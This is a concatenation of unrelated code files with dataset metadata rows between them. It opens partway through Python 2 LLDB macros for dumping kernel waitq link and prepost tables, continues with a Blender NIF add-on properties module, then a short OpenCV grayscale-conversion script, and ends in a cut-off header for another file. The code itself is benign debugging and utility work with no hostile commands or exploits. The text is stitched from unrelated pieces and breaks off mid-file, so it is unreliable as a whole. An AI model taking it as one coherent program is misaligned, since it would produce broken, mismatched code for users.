print "<<<invalid link:{:d}>>>".format(id)
ninv += 1
else:
lt = WaitqTableElemType(link)
isvalid = WaitqTableElemValid(link)
inconsistent = 0
do_print = not ( (isvalid and opt_invalid_only) or (not isvalid and opt_valid_only) )
if do_print and opt_subtype_filter != 0 and lt == "LINK":
lID = link.wql_link.left_setid
rID = link.wql_link.right_setid
left = GetWaitqLink(lID)[0]
right = GetWaitqLink(rID)[0]
lValid = WaitqTableElemValid(left)
rValid = WaitqTableElemValid(right)
if opt_subtype_filter == "iL":
if lValid or (not lValid and not rValid):
do_print = False
elif opt_subtype_filter == "iR":
if rValid or (not rValid and not lValid):
do_print = False
elif opt_subtype_filter == "iLR":
if rValid or lValid:
do_print = False
elif opt_subtype_filter == "iLRI" and hasattr(link, 'sl_alloc_task'):
# only print this if both left and right are invalid
# and the allocating task is unknown/dead
do_print = False
is_dead = 0
pid = -1
try:
pid = GetProcPIDForTask(link.sl_alloc_task)
except:
if link.sl_alloc_task:
pid = unsigned(link.sl_alloc_task.audit_token.val[5])
if pid < 0:
is_dead = 1
else:
pidnm = GetProcNameForPid(pid)
if pidnm == "Unknown":
is_dead = 1
if (not rValid) and (not lValid) and is_dead:
do_print = True
if do_print and opt_type_filt == "" and opt_subtype_filter == "iP" and hasattr(link, 'sl_alloc_task'):
# Only print non-free table objects that were allocated by
# dead processes
do_print = False
is_dead = 0
pid = -1
try:
pid = GetProcPIDForTask(link.sl_alloc_task)
except:
if link.sl_alloc_task:
pid = unsigned(link.sl_alloc_task.audit_token.val[5])
if pid < 0:
is_dead = 1
else:
pidnm = GetProcNameForPid(pid)
if pidnm == "Unknown":
is_dead = 1
if is_dead:
do_print = True
if (opt_type_filt == "" or opt_type_filt == lt) and do_print:
if lt == "ELEM":
nwqs += 1
elif lt == "LINK":
nlink += 1
elif lt == "RSVD":
nrsvd += 1
elif lt == "FREE":
nfree += 1
else:
ninv += 1
inconsistent = 1
if hasattr(link, 'sl_alloc_bt'):
pc = unsigned(link.sl_alloc_bt[opt_bt_idx])
pc_str = str(pc)
if pc > 0:
if pc_str in bt_summary:
bt_summary[pc_str] += 1
else:
bt_summary[pc_str] = 1
if not opt_summary:
print GetWaitqSetidLinkSummary(link, verbose)
if inconsistent:
ninconsistent += 1
# print out warnings about inconsistent state as we parse
# the list - even if the caller wants a summary
print "[WARNING] inconsistent state in idx: {:d} ({:s} element)".format(link.wqte.lt_id.idx, lt)
if opt_cross_check == 1 and lt == "ELEM":
wq = unsigned(addressof(link.wql_wqs.wql_set.wqset_q))
if wq in wq_ptr:
wq_ptr[wq].append(id)
l = len(wq_ptr[wq])
if l == 2:
nduplicated_wqs += 1
if l > max_wqs_dupes:
max_wqs_dupes = l
else:
wq_ptr[wq] = [ id ]
nunique_wqs += 1
id += 1
if opt_summary or verbose:
if verbose and opt_cross_check:
sys.stderr.write('[{:d}|{:d}|{:d}] id: {:d}/{:d}... \r'.format(nunique_wqs, nduplicated_wqs, max_wqs_dupes, id, nelem))
else:
sys.stderr.write('id: {:d}/{:d}... \r'.format(id, nelem))
nused = nwqs + nlink + nrsvd
nfound = nused + nfree + ninv
print "\n\nFound {:d} objects: {:d} WQS, {:d} LINK, {:d} RSVD, {:d} FREE".format(nfound, nwqs, nlink, nrsvd, nfree)
if (opt_type_filt == "" and opt_valid_only == 0) and (nused != table.used_elem):
print"\tWARNING: inconsistent state! Table reports {:d}/{:d} used elem, found {:d}/{:d}".format(table.used_elem, nelem, nused, nfound)
if len(bt_summary) > 0:
print "Link allocation BT (frame={:d})".format(opt_bt_idx)
for k,v in bt_summary.iteritems():
print "\t[{:d}] from: {:s}".format(v, GetSourceInformationForAddress(unsigned(k)))
if opt_cross_check:
print "\n{:d} Duplicated WQS objects:".format(nduplicated_wqs)
for wq in wq_ptr:
l = len(wq_ptr[wq])
if l > 1:
print "\tWQS:{:#x} ({:d} {:s}".format(wq, l, str(wq_ptr[wq]))
# EndMacro: showallsetidlinks
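# Hypothetical invocations of the macro above (values are placeholders):
#   (lldb) showallsetidlinks -Q                  # quiet mode: only the per-type object counts
#   (lldb) showallsetidlinks -V 1 -T LINK        # only valid LINK objects
#   (lldb) showallsetidlinks -T LINK -S iLR -X   # LINKs with invalid left+right pointers, plus WQS duplicate cross-check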
# Macro: showallpreposts
@lldb_command('showallpreposts', 'VQT:F:Y:')
def ShowAllPreposts(cmd_args=None, cmd_options={}):
""" Dump / summarize all waitq prepost linkage elements
usage: showallpreposts [-V] [-T {type}] [-Y n] [-F n] [-Q]
-V : only show valid / live links
-T {type} : only display objects of type {type}
-Y {0|1} : only only show POST objects that are
valid (-Y 1) or invalid (-Y 0)
-F n : summarize the backtraces at frame level 'n'
-Q : be quiet, only summarize
"""
opt_summary = 0
opt_type_filt = ""
opt_valid_only = 0
opt_post_type = -1
opt_bt_idx = 0
verbose = False
if config['verbosity'] > vHUMAN:
verbose = True
if "-Q" in cmd_options:
opt_summary = 1
if "-V" in cmd_options:
opt_valid_only = 1
if "-Y" in cmd_options:
opt_post_type = unsigned(cmd_options["-Y"])
if opt_post_type != 0 and opt_post_type != 1:
raise ArgumentError("Invalid POST obj specifier [-Y %d] (expected 0 or 1)" % cmd_options["-Y"])
if "-F" in cmd_options:
opt_bt_idx = unsigned(cmd_options["-F"])
if hasattr(kern.globals, "g_nwaitq_btframes"):
if opt_bt_idx >= unsigned(kern.globals.g_nwaitq_btframes):
raise ArgumentError("Invalid BT index '{:s}' max:{:d}".format(cmd_options["-F"], unsigned(kern.globals.g_nwaitq_btframes) - 1))
if "-T" in cmd_options:
opt_type_filt = cmd_options["-T"]
if opt_type_filt == "FREE" or opt_type_filt == "RSVD":
pass
elif opt_type_filt == "POST":
opt_type_filt = "LINK"
elif opt_type_filt == "WQ":
opt_type_filt = "ELEM"
else:
raise ArgumentError("Invalid type filter'{:s}'".format(cmd_options["-T"]))
table = kern.globals.g_prepost_table
nelem = int(table.nelem)
bt_summary = {}
nfree = 0
ninv = 0
nwq = 0
npost = 0
nrsvd = 0
hdr_str = "Looking through {:d} objects from g_prepost_table@{:<#x}".format(nelem, addressof(kern.globals.g_prepost_table))
if opt_type_filt != "" or opt_valid_only != 0:
hdr_str += "\n\t`-> for "
if opt_valid_only:
hdr_str += "valid "
else:
hdr_str += "all "
if opt_type_filt == "":
hdr_str += "objects"
else:
hdr_str += "{:s} objects".format(cmd_options["-T"])
print hdr_str
if not opt_summary:
print GetWaitqPrepostSummary.header
id = 0
while id < nelem:
wqp = GetWaitqPrepost(id)[0]
if wqp == 0:
print "<<<invalid prepost:{:d}>>>".format(id)
ninv += 1
else:
lt = WaitqTableElemType(wqp)
isvalid = WaitqTableElemValid(wqp)
should_count = 1
if isvalid and opt_post_type > -1 and lt == "LINK":
post_wqp = GetWaitqPrepost(wqp.wqp_post.wqp_wq_id)[0]
post_valid = WaitqTableElemValid(post_wqp)
if opt_post_type == 0 and post_valid: # only count _invalid_ POST objects
should_count = 0
elif opt_post_type == 1 and not post_valid: # only count _valid_ POST objects
should_count = 0
if should_count and (opt_type_filt == "" or opt_type_filt == lt) and ((opt_valid_only == 0 or isvalid)):
if lt == "ELEM":
nwq += 1
elif lt == "LINK":
npost += 1
elif lt == "RSVD":
nrsvd += 1
elif lt == "FREE":
nfree += 1
else:
ninv += 1
if hasattr(wqp, 'wqp_alloc_bt'):
pc = unsigned(wqp.wqp_alloc_bt[opt_bt_idx])
pc_str = str(pc)
if pc > 0:
if pc_str in bt_summary:
bt_summary[pc_str] += 1
else:
bt_summary[pc_str] = 1
if not opt_summary:
print GetWaitqPrepostSummary(wqp)
if verbose:
sys.stderr.write('id: {:d}/{:d}... \r'.format(id, nelem))
id += 1
nused = nwq + npost + nrsvd
nfound = nused + nfree + ninv
print "\nFound {:d} objects: {:d} WQ, {:d} POST, {:d} RSVD, {:d} FREE".format(nfound, nwq, npost, nrsvd, nfree)
if (opt_type_filt == "" and opt_valid_only == 0) and (nused != table.used_elem):
print"\tWARNING: inconsistent state! Table reports {:d}/{:d} used elem, found {:d}/{:d}".format(table.used_elem, nelem, nused, nfound)
if len(bt_summary) > 0:
print "Link allocation BT (frame={:d})".format(opt_bt_idx)
for k,v in bt_summary.iteritems():
print "\t[{:d}] from: {:s}".format(v, GetSourceInformationForAddress(unsigned(k)))
# EndMacro: showallpreposts
@lldb_type_summary(['wq_prepost', 'wq_prepost *'])
@header("{:<18s} {:<18s} {:<19s} {:<10s} {:<1s} {:<4s} {:<10s} {:<20s}".format('addr','id','idx','gen','V','type','refcnt','info'))
def GetWaitqPrepostSummary(wqp):
if not wqp:
return
fmt_str = "{w: <#18x} {w.wqte.lt_id.id: <#18x} {w.wqte.lt_id.idx: <7d} (->{w.wqte.lt_next_idx: <7d}) {w.wqte.lt_id.generation: <#10x} {v: <1s} {t: <4s} {rcnt: <10d} "
type = WaitqTableElemType(wqp)
if type == "ELEM":
type = "WQ"
elif type == "LINK":
type = "POST"
v = "F"
if WaitqTableElemValid(wqp):
v = "T"
refcnt = WaitqTableElemRefcnt(wqp)
out_str = fmt_str.format(w=wqp, v=v, t=type, rcnt=refcnt)
if type == "WQ":
out_str += "wq:{0: <#18x}".format(unsigned(wqp.wqp_wq.wqp_wq_ptr))
elif type == "POST":
out_str += "next:{0: <#18x}, wqid:{1: <#18x}".format(wqp.wqp_post.wqp_next_id, wqp.wqp_post.wqp_wq_id)
post_wqp = GetWaitqPrepost(wqp.wqp_post.wqp_wq_id)[0]
if not WaitqTableElemValid(post_wqp):
out_str += "(<invalid>)"
else:
if WaitqTableElemType(post_wqp) != "ELEM":
out_str += "(!WQP_WQ?)"
else:
out_str += "({0: <#18x})".format(unsigned(post_wqp.wqp_wq.wqp_wq_ptr))
return out_str
# Macro: showprepost
@lldb_command('showprepost', "P:")
def ShowPrepost(cmd_args=None, cmd_options={}):
""" Print prepost structure summary
Note: you can pass either a complete ID (generation + index), or
just the index to the -P argument.
usage: showprepost [-P ID] [0xaddr]
-P {ID} : show prepost structure whose ID is {ID}
"""
wqp = 0
if "-P" in cmd_options:
wqp, warn_str = GetWaitqPrepost(unsigned(kern.GetValueFromAddress(cmd_options["-P"], 'uint64_t *')))
if wqp == 0:
if warn_str != '':
raise LookupError(warn_str)
else:
raise ArgumentError("Invalid prepost ID {:s}".format(cmd_options["-P"]))
if wqp == 0:
if not cmd_args:
raise ArgumentError("Please pass the address of a prepost object")
wqp = kern.GetValueFromAddress(cmd_args[0], 'wq_prepost *')
if not wqp:
raise ArgumentError("Invalid prepost {:s}".format(cmd_args[0]))
print GetWaitqPrepostSummary.header
print GetWaitqPrepostSummary(wqp)
# EndMacro: showprepost
def WaitqPrepostFromObj(wqp, head_id, inv_ok, prepost_str, pp_arr = 0, depth = 0):
if pp_arr != 0:
pp_arr.append(wqp)
etype = WaitqTableElemType(wqp)
if not WaitqTableElemValid(wqp) and not inv_ok:
id = 0
if wqp:
id = wqp.wqte.lt_id.id
prepost_str.append("{0: <#18x}:{1: <18s}".format(id, "<invalid>"))
return
if etype == "ELEM": # WQP_WQ
prepost_str.append("{0: <#18x}:{1: <#18x}".format(wqp.wqte.lt_id.id, unsigned(wqp.wqp_wq.wqp_wq_ptr)))
return
post_wq = 0
if etype == "LINK": # WQP_POST
next_id = wqp.wqp_post.wqp_next_id
post_wq = GetWaitqPrepost(wqp.wqp_post.wqp_wq_id)[0]
if WaitqTableElemValid(post_wq):
if WaitqTableElemType(post_wq) != "ELEM":
prepost_str.append("{0: <#18x}:{1: <18s}".format(post_wq.wqte.lt_id.id, "<invalid post>"))
else:
prepost_str.append("{0: <#18x}:{1: <#18x}".format(wqp.wqte.lt_id.id, unsigned(post_wq.wqp_wq.wqp_wq_ptr)))
if next_id > 0 and next_id != head_id:
if depth >= 950:
prepost_str.append("{: <37s}".format("!recursion limit!"))
return
WaitqPrepostFromObj(GetWaitqPrepost(next_id)[0], head_id, inv_ok, prepost_str, pp_arr, depth + 1)
else: # "RSVD" or "FREE":
prepost_str.append("{0: <#18x} -> {1: <15d}".format(wqp.wqte.lt_id.id, wqp.wqte.lt_next_idx))
next_id = wqp.wqte.lt_next_idx
max_elem = int(kern.globals.g_prepost_table.nelem)
if hasattr(kern.globals, 'g_lt_idx_max'):
max_elem = unsigned(kern.globals.g_lt_idx_max)
if next_id < max_elem:
if depth >= 950:
prepost_str.append("{: <37s}".format("!recursion limit!"))
return
WaitqPrepostFromObj(GetWaitqPrepost(next_id)[0], head_id, inv_ok, prepost_str, pp_arr, depth + 1)
return
def GetPrepostChain(head_id, inv_ok = False, pp_arr = 0):
pp = []
if unsigned(head_id) == 0:
return [ "{0: <#18x}:{1: <18s}".format(head_id, "<invalid>") ]
wqp = GetWaitqPrepost(head_id)[0]
if wqp != 0:
WaitqPrepostFromObj(wqp, head_id, inv_ok, pp, pp_arr)
else:
return [ "{0: <#18x}:{1: <18s}".format(head_id, "<invalid>") ]
return pp
def GetWaitqPreposts(waitq):
if GetWaitqStateStr(waitq) != "SET":
return []
wqset = Cast(waitq, 'waitq_set *')
if wqset.wqset_prepost_id == 0:
return []
return GetPrepostChain(wqset.wqset_prepost_id)
# Macro: showprepostchain
@lldb_command('showprepostchain', "P:")
def ShowPrepostChain(cmd_args=None, cmd_options={}):
""" Follow a chain of preposts, printing each one.
Note that prepost chains are circular, so this will print
the entire chain given a single element.
Note: you can pass either a complete ID (generation + index), or
just the index to the -P argument.
usage: showprepostchain [-P ID] [0xaddr]
-P {ID} : start printing with the prepost whose ID is {ID}
"""
wqp = 0
if "-P" in cmd_options:
wqp, warn_str = GetWaitqPrepost(unsigned(kern.GetValueFromAddress(cmd_options["-P"], 'uint64_t *')))
if wqp == 0:
if warn_str != '':
raise LookupError(warn_str)
else:
raise ArgumentError("Invalid prepost ID {:s}".format(cmd_options["-P"]))
if wqp == 0:
if not cmd_args:
raise ArgumentError("Please pass the address of a prepost object")
wqp = kern.GetValueFromAddress(cmd_args[0], 'wq_prepost *')
if not wqp:
raise ArgumentError("Invalid prepost {:s}".format(cmd_args[0]))
pp_arr = []
GetPrepostChain(wqp.wqte.lt_id.id, True, pp_arr)
pp_cnt = len(pp_arr)
idx = 0
nvalid = 0
ninvalid = 0
print GetWaitqPrepostSummary.header
while idx < pp_cnt:
print GetWaitqPrepostSummary(pp_arr[idx])
if pp_arr[idx] != 0:
type = WaitqTableElemType(pp_arr[idx])
if type == "LINK":
post_wqp = GetWaitqPrepost(pp_arr[idx].wqp_post.wqp_wq_id)[0]
if not WaitqTableElemValid(post_wqp):
ninvalid += 1
else:
nvalid += 1
else:
nvalid += 1
idx += 1
print "%s" % '-'*86
print "Total: {:d} ({:d} valid, {:d} invalid)".format(len(pp_arr), nvalid, ninvalid)
# EndMacro: showprepostchain
@lldb_type_summary(['waitq', 'waitq *'])
@header("{: <16s} {: <3s} {: <4s} {: <17s} {: <18s} {: <18s} {: <37s} {: <22s} {: <10s}".format('waitq', 'typ', 'bits', 'evtmask', 'setid', 'wq_wqp', 'preposts', 'member_of', 'threads'))
def GetWaitqSummary(waitq):
fmt_str = "{q: <16x} {state: <3s} {bits: <4s} {q.waitq_eventmask: <#17x} {setid: <#18x} {q.waitq_prepost_id: <#18x}"
th_str = []
if waitq.waitq_queue.next and waitq.waitq_queue.prev:
for thread in IterateLinkageChain(addressof(waitq.waitq_queue), 'thread *', 'wait_links'):
th_str.append("{: <18s} e:{: <#18x}".format(hex(thread), thread.wait_event))
else:
th_str.append("{: <39s}".format('<invalid (NULL) queue>'))
th_cnt = len(th_str)
set_str = GetWaitqSets(waitq)
set_cnt = len(set_str)
pp_str = GetWaitqPreposts(waitq)
pp_cnt = len(pp_str)
last_str = ''
idx = 0;
while idx < pp_cnt or idx < set_cnt or idx < th_cnt:
p = ""
s = ""
t = ""
if idx < pp_cnt:
p = pp_str[idx]
if idx < set_cnt:
s = set_str[idx]
if idx < th_cnt:
t = th_str[idx]
if idx == 0:
last_str += "{0: <37s} {1: <22s} {2: <39s}".format(p, s, t)
else:
last_str += "\n{0: <80s} {1: <37s} {2: <22s} {3: <39s}".format('', p, s, t)
idx += 1
if pp_cnt > 0 or set_cnt > 0 or th_cnt > 0:
last_str += "\n{:<80s} {: <37s} {: <22s} {: <39s}".format('', '-'*37, '-'*20, '-'*39)
last_str += "\n{0: <80s} {1: <37d} {2: <22d} {3: <39d}".format('', pp_cnt, set_cnt, th_cnt)
state = GetWaitqStateStr(waitq)
setid = 0
if state == "SET":
setid = Cast(waitq, 'waitq_set *').wqset_id
out_str = fmt_str.format(q=waitq, state=state, bits=GetWaitqBitsStr(waitq), setid=setid)
out_str += last_str
return out_str
# Macro: showwaitq
@lldb_command('showwaitq', "P:S:")
def ShowWaitq(cmd_args=None, cmd_options={}):
""" Print waitq structure summary.
Lookup the waitq either by address, by Set ID, or indirectly
through a prepost object that points to the waitq.
Note: you can pass either a complete ID (generation + index), or
just the index to the -P and -S arguments.
usage: showwaitq [-P PrePostID] [-S SetID] [0xaddr]
-P {ID} : prepost ID that points to a waitq
-S {ID} : waitq_set ID
"""
waitq = 0
if "-P" in cmd_options:
wqp, warn_str = GetWaitqPrepost(unsigned(kern.GetValueFromAddress(cmd_options["-P"], 'uint64_t *')))
if wqp == 0:
if warn_str:
raise LookupError(warn_str)
else:
raise ArgumentError("Invalid prepost ID {:s}".format(cmd_options["-P"]))
if WaitqTableElemType(wqp) != "ELEM":
raise ArgumentError("Prepost ID {:s} points to a WQP_POST object, not a WQP_WQ!".format(cmd_options["-P"]))
waitq = wqp.wqp_wq.wqp_wq_ptr
if "-S" in cmd_options:
if waitq:
raise ArgumentError("Please pass only one of '-S' or '-P'!")
link, warn_str = GetWaitqLink(unsigned(kern.GetValueFromAddress(cmd_options["-S"],'uint64_t *')))
if not link:
if warn_str != '':
raise LookupError(warn_str)
else:
raise ArgumentError("Invalid link ID {:s}".format(cmd_options["-S"]))
if WaitqTableElemType(link) != "ELEM":
raise ArgumentError("Link ID {:s} points to a SLT_LINK object, not an SLT_WQS!".format(cmd_options["-S"]))
waitq = addressof(link.wql_wqs.wql_set.wqset_q)
if not waitq and not cmd_args:
raise ArgumentError("Please pass the address of a waitq!")
if not waitq:
waitq = kern.GetValueFromAddress(cmd_args[0], 'waitq *')
if not waitq:
raise ("Unknown arguments: %r %r" % (cmd_args, cmd_options))
print GetWaitqSummary.header
print GetWaitqSummary(waitq)
# EndMacro: showwaitq
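# Hypothetical invocations of the macro above (IDs/addresses are placeholders):
#   (lldb) showwaitq 0xffffff80deadbeef   # by waitq address
#   (lldb) showwaitq -S 0x123             # via a waitq_set ID
#   (lldb) showwaitq -P 0x456             # via a prepost WQP_WQ object that points at the waitq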
# Macro: showglobalwaitqs
@lldb_command('showglobalwaitqs')
def ShowGlobalWaitqs(cmd_args=None):
""" Summarize global waitq usage
"""
global kern
q = 0
print "Global waitq objects"
print GetWaitqSummary.header
while q < kern.globals.g_num_waitqs:
print GetWaitqSummary(addressof(kern.globals.global_waitqs[q]))
q = q + 1
# EndMacro: showglobalwaitqs
# Macro: showglobalqstats
@lldb_command('showglobalqstats', "OF")
def ShowGlobalQStats(cmd_args=None, cmd_options={}):
""" Summarize global waitq statistics
usage: showglobalqstats [-O] [-F]
-O : only output waitqs with outstanding waits
-F : output as much backtrace as was recorded
"""
global kern
q = 0
if not hasattr(kern.globals, 'g_waitq_stats'):
print "No waitq stats support (use DEVELOPMENT kernel)!"
return
print "Global waitq stats"
print "{0: <18s} {1: <8s} {2: <8s} {3: <8s} {4: <8s} {5: <8s} {6: <32s}".format('waitq', '#waits', '#wakes', '#diff', '#fails', '#clears', 'backtraces')
waiters_only = False
full_bt = False
if "-O" in cmd_options:
waiters_only = True
if "-F" in cmd_options:
full_bt = True
fmt_str = "{q: <#18x} {stats.waits: <8d} {stats.wakeups: <8d} {diff: <8d} {stats.failed_wakeups: <8d} {stats.clears: <8d} {bt_str: <s}"
while q < kern.globals.g_num_waitqs:
waitq = kern.globals.global_waitqs[q]
stats = kern.globals.g_waitq_stats[q]
diff = stats.waits - stats.wakeups
if diff == 0 and waiters_only:
q = q + 1
continue
last_waitstr = ''
last_wakestr = ''
fw_str = ''
if (stats.last_wait[0]):
last_waitstr = GetSourceInformationForAddress(unsigned(stats.last_wait[0]))
if (stats.last_wakeup[0]):
last_wakestr = GetSourceInformationForAddress(unsigned(stats.last_wakeup[0]))
if (stats.last_failed_wakeup[0]):
fw_str = GetSourceInformationForAddress(unsigned(stats.last_failed_wakeup[0]))
if full_bt:
f = 1
while f < kern.globals.g_nwaitq_btframes:
if stats.last_wait[f]:
last_waitstr = "{0}->{1}".format(GetSourceInformationForAddress(unsigned(stats.last_wait[f])), last_waitstr)
if stats.last_wakeup[f]:
last_wakestr = "{0}->{1}".format(GetSourceInformationForAddress(unsigned(stats.last_wakeup[f])), last_wakestr)
if stats.last_failed_wakeup[f]:
fw_str = "{0}->{1}".format(GetSourceInformationForAddress(unsigned(stats.last_failed_wakeup[f])), fw_str)
f = f + 1
bt_str = ''
if last_waitstr:
bt_str += "wait : " + last_waitstr
if last_wakestr:
if bt_str:
bt_str += "\n{0: <70s} ".format('')
bt_str += "wake : " + last_wakestr
if fw_str:
if bt_str:
bt_str += "\n{0: <70s} ".format('')
bt_str += "fails: " + fw_str
print fmt_str.format(q=addressof(waitq), stats=stats, diff=diff, bt_str=bt_str)
q = q + 1
# EndMacro: showglobalqstats
| 39.878505 | 186 | 0.556269 |
a35b09a17430d5ac93f8035c4cc4f7dadf67b539 | 6,561 | py | Python | io_scene_niftools/properties/object.py | ZtModArchive/blender_niftools_addon | fc28f567e1fa431ec6633cb2a138898136090b29 | [
"BSD-3-Clause"
] | 3 | 2019-10-13T19:08:12.000Z | 2020-03-26T08:25:20.000Z | io_scene_niftools/properties/object.py | ZtModArchive/blender_niftools_addon | fc28f567e1fa431ec6633cb2a138898136090b29 | [
"BSD-3-Clause"
] | 1 | 2019-09-22T12:00:04.000Z | 2019-09-22T12:00:04.000Z | io_scene_niftools/properties/object.py | ZtModArchive/blender_niftools_addon | fc28f567e1fa431ec6633cb2a138898136090b29 | [
"BSD-3-Clause"
] | null | null | null | """ Nif User Interface, custom nif properties for objects"""
# ***** BEGIN LICENSE BLOCK *****
#
# Copyright © 2014, NIF File Format Library and Tools contributors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of the NIF File Format Library and Tools
# project nor the names of its contributors may be used to endorse
# or promote products derived from this software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# ***** END LICENSE BLOCK *****
import bpy
from bpy.props import (PointerProperty,
StringProperty,
IntProperty,
EnumProperty,
CollectionProperty,
FloatProperty
)
from bpy.types import PropertyGroup, Object
from pyffi.formats.nif import NifFormat
from io_scene_niftools.utils.decorators import register_classes, unregister_classes
prn_array = [
["OBLIVION", "FALLOUT_3", "SKYRIM"],
["DAGGER", "SideWeapon", "Weapon", "WeaponDagger"],
["2HANDED", "BackWeapon", "Weapon", "WeaponBack"],
["BOW", "BackWeapon", None, "WeaponBow"],
["MACE", "SideWeapon", "Weapon", "WeaponMace"],
["SHIELD", "Bip01 L ForearmTwist", None, "SHIELD"],
["STAFF", "Torch", "Weapon", "WeaponStaff"],
["SWORD", "SideWeapon", "Weapon", "WeaponSword"],
["AXE", "SideWeapon", "Weapon", "WeaponAxe"],
["QUIVER", "Quiver", "Weapon", "QUIVER"],
["TORCH", "Torch", "Weapon", "SHIELD"],
["HELMET", "Bip01 Head", "Bip01 Head", "NPC Head [Head]"],
["RING", "Bip01 R Finger1", "Bip01 R Finger1", "NPC R Finger10 [RF10]"]
]
# PRN_DICT is a dict like so: dict['SLOT']['GAME']: 'Bone'
PRN_DICT = {}
for row in prn_array[1:]:
PRN_DICT[row[0]] = dict(zip(prn_array[0], row[1:]))
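# For illustration, the nested dict built above maps slot -> game -> attachment bone, e.g.
# PRN_DICT['BOW']['OBLIVION'] == 'BackWeapon', PRN_DICT['SHIELD']['SKYRIM'] == 'SHIELD',
# and PRN_DICT['BOW']['FALLOUT_3'] is None (no bow attachment point defined for that game).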
class ExtraData(PropertyGroup):
name: StringProperty()
data: StringProperty()
sub_class: StringProperty()
class BSXFlags:
# type = NifFormat.BSXFlags()
# data = {}
def __init__(self):
self.name = "BSXFlag"
class ExtraDataStore(PropertyGroup):
extra_data_index: IntProperty()
extra_data: CollectionProperty(
name="Extra Data",
description="Used to store all the Extra data",
type=ExtraData
)
class ObjectProperty(PropertyGroup):
rootnode: EnumProperty(
name='Nif Root Node',
description='Type of property used to display meshes',
items=(
('NiNode', 'NiNode', "", 0),
('BSFadeNode', 'BSFadeNode', "", 1)),
default='NiNode',
)
prn_location: EnumProperty(
name='Weapon Location',
description='Attachment point of weapon, for Skyrim, FO3 & Oblivion',
items=[(item, item, "", i) for i, item in enumerate(["NONE"] + list(PRN_DICT.keys()))],
# default = 'NONE'
)
longname: StringProperty(
name='Nif Long Name'
)
consistency_flags: EnumProperty(
name='Consistency Flag',
description='Controls animation type',
items=[(item, item, "", i) for i, item in enumerate(NifFormat.ConsistencyType._enumkeys)],
# default = 'SHADER_DEFAULT'
)
flags: IntProperty(
name='Object Flag',
description='Controls animation and collision',
default=0
)
bsxflags: IntProperty(
name='BSX Flags',
description='Controls animation and collision',
default=0 # 2 = Bit 1, enable collision
)
upb: StringProperty(
name='UPB',
description='Commands for an optimizer?',
default=''
)
extra_data_store: PointerProperty(
name="Extra Data",
description="Used to store all the Extra data",
type=ExtraDataStore,
)
skeleton_root: StringProperty(
name='Skeleton Root',
description="The bone that acts as the root of the SkinInstance",
)
class BsInventoryMarker(PropertyGroup):
name: StringProperty(
name="",
default='INV'
)
bs_inv_x: FloatProperty(
name="Inv X value",
description="Rotation of object in inventory around the x axis",
default=0,
subtype = "ANGLE"
)
bs_inv_y: FloatProperty(
name="Inv Y value",
description="Rotation of object in inventory around the y axis",
default=0,
subtype = "ANGLE"
)
bs_inv_z: FloatProperty(
name="Inv Z value",
description="Rotation of object in inventory around the z axis",
default=0,
subtype = "ANGLE"
)
bs_inv_zoom: FloatProperty(
name="Inv Zoom Value",
description="Inventory object Zoom level",
default=1
)
CLASSES = [
ExtraData,
ExtraDataStore,
ObjectProperty,
BsInventoryMarker
]
def register():
register_classes(CLASSES, __name__)
bpy.types.Object.niftools = bpy.props.PointerProperty(type=ObjectProperty)
bpy.types.Object.niftools_bs_invmarker = bpy.props.CollectionProperty(type=BsInventoryMarker)
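# Once register() has run, the properties are reachable from any object datablock.
# Sketch (assumes an active object in the scene):
#   obj = bpy.context.object
#   obj.niftools.bsxflags = 2              # bit 1 enables collision (see the property default comment above)
#   obj.niftools.prn_location = 'SHIELD'   # weapon/armor attachment slot
#   inv = obj.niftools_bs_invmarker.add()  # add a BSInvMarker entry
#   inv.bs_inv_zoom = 1.5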
def unregister():
del bpy.types.Object.niftools
del bpy.types.Object.niftools_bs_invmarker
unregister_classes(CLASSES, __name__)
| 30.235023 | 98 | 0.637098 |
035af7ad1ec4150ab8b22f99fb860ae769afff87 | 317 | py | Python | img2Grey.py | Andre-luv/HCAP2021-EQUIPOS | c6a12b9796417a0516e5bf2bea9237a8809572b8 | [
"MIT"
] | null | null | null | img2Grey.py | Andre-luv/HCAP2021-EQUIPOS | c6a12b9796417a0516e5bf2bea9237a8809572b8 | [
"MIT"
] | null | null | null | img2Grey.py | Andre-luv/HCAP2021-EQUIPOS | c6a12b9796417a0516e5bf2bea9237a8809572b8 | [
"MIT"
] | 1 | 2021-03-19T18:55:32.000Z | 2021-03-19T18:55:32.000Z | import cv2
import numpy as np
def img2Grey(original,nombre):
IRGB = cv2.imread(original)
IGS = cv2.cvtColor(IRGB, cv2.COLOR_BGR2GRAY)
return cv2.imwrite(nombre,IGS)
img2Grey("002.jpeg","002GS.jpeg")
img2Grey("003.jpeg","003GS.jpeg")
img2Grey("008.jpeg","008GS.jpeg")
img2Grey("011.jpeg","011GS.jpeg")
| 16.684211 | 45 | 0.712934 |
55d1d94c0d22fad7e8f1aeb30e709678fb8fc844 | 3,895 | py | Python | lightly/openapi_generated/swagger_client/models/update_docker_worker_registry_entry_request.py | CodeGuy-007/lightly | 64143fe8a477c04288009c65fa1265cef8aa48f8 | [
"MIT"
] | 1 | 2022-03-10T00:22:30.000Z | 2022-03-10T00:22:30.000Z | lightly/openapi_generated/swagger_client/models/update_docker_worker_registry_entry_request.py | CodeGuy-007/lightly | 64143fe8a477c04288009c65fa1265cef8aa48f8 | [
"MIT"
